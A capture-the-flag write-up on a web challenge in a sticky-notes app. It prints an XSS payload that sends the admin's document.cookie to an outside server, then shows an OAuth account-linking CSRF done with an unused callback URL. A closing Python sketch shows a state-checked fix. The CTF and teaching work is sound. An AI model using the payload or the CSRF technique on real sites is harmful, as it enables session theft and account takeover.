![b8351bcaa9a2c4d2246c9e9412d2ce84.png](492eaf1024724a9ca716c9488041f549.png)
![0bdc89d9ac711b90060c2efcd6e50766.png](194b0105be5c4b2196726b27fee573ba.png)

Sticky notes app. There are a couple of interesting things to note here: 'Link with OAuth' and 'Report a problem'. Checking out 'Report a problem' first.

![2f994cc8af90afa91f61b5c56a833ef8.png](613f6f1376ce47cc9e1f7d056e274f76.png)

So this got me thinking. If the admin is looking into the reports, maybe there's some kind of vulnerability on the back end. I fired up my VPS and started a PHP server to see if I could steal some cookies.

Reported this payload as a problem:

`<img src=x onerror=document.location="http://REDACTED/cookie.php?c="+document.cookie>`

![c80de1261875b7febaed611b723b297e.png](8e71371de3cc4b7b9d0572989c3ea670.png)

So XSS is in play, but the cookies are set to HttpOnly. No dice there.

The title of the challenge is a big hint on what to do next: Cross Site Request Forgery, or CSRF (Sea Surf) for short. I assumed it had something to do with OAuth, so I fired up Burp to capture the requests.

![f6c0f620a4d8846eba98145f09db76ac.png](2b36c296013c4410913a3ea0f2ce1679.png)

Forwarding the first request leaves us with the second.

![52f1070d8556b9c975c44e09c5e57534.png](e17df666af4a46bb964b8f33299dd565.png)

After some testing I noted that the 'code' parameter is single-use. So I sent this request to Repeater and dropped it. Right click anywhere on the request and 'Copy URL'.

Back on the sticky notes app, we can report another problem:

![dec2ed14f41e070eb7d643b2e93e5199.png](2f0263c5f4584d3d9cccf555e2d483f6.png)

Send that off, then log into our OAuth account and we can see that we're now connected to the Admin's sticky notes account.

![49e6c0bd28fd3ce4b0dac9b75d8f2297.png](1964d857005945028795c85269ad0809.png)

---

Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]

Tags: #ctf #oauth #csrf #web

Related:
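The account-linking CSRF in this write-up works because the OAuth callback accepts any valid `code` without checking that the logged-in browser is the one that started the link flow. As an added example (not the challenge's code), here is a minimal simulation of such a vulnerable callback beside one that binds a random per-session `state` value, replaying the write-up's scenario against both; the provider, sessions and authorization codes are constructed stand-ins.

```python
import secrets

def redeem_code(codes, code):
    """Stand-in for the provider's token endpoint: codes are single-use."""
    return codes.pop(code, None)

def callback_vulnerable(codes, session, params):
    """Link whatever identity the code resolves to, to whoever is logged in.
    Nothing ties the callback to a flow this browser started."""
    identity = redeem_code(codes, params.get("code", ""))
    if identity is None:
        return "invalid code"
    session["linked_oauth"] = identity
    return "linked"

def start_link(session):
    """Begin a link flow: bind a fresh random state value to this session."""
    session["oauth_state"] = secrets.token_urlsafe(32)
    return session["oauth_state"]

def callback_hardened(codes, session, params):
    """Accept the callback only with the state this session issued (single use)."""
    expected = session.pop("oauth_state", None)
    if expected is None or not secrets.compare_digest(expected, params.get("state", "")):
        return "state mismatch"
    identity = redeem_code(codes, params.get("code", ""))
    if identity is None:
        return "invalid code"
    session["linked_oauth"] = identity
    return "linked"

def replay_forged_callback(handler):
    """Replay the write-up: attacker starts their own flow, keeps the callback
    URL unused, and the admin's browser later follows it. Returns what got linked."""
    codes = {"code-attacker-1": "attacker@oauth.example"}   # constructed
    attacker, admin = {"user": "attacker"}, {"user": "admin"}
    forged = {"code": "code-attacker-1", "state": start_link(attacker)}
    handler(codes, admin, forged)          # attacker's state, admin's session
    return admin.get("linked_oauth")

def legitimate_link():
    """The admin completes a flow they started themselves; this must still work."""
    codes = {"code-admin-1": "admin@oauth.example"}         # constructed
    admin = {"user": "admin"}
    params = {"code": "code-admin-1", "state": start_link(admin)}
    callback_hardened(codes, admin, params)
    return admin.get("linked_oauth")
```

Note that the attacker's own `state` does not help them: the check compares against the value stored in the victim's session, so only a flow the victim's browser started can complete.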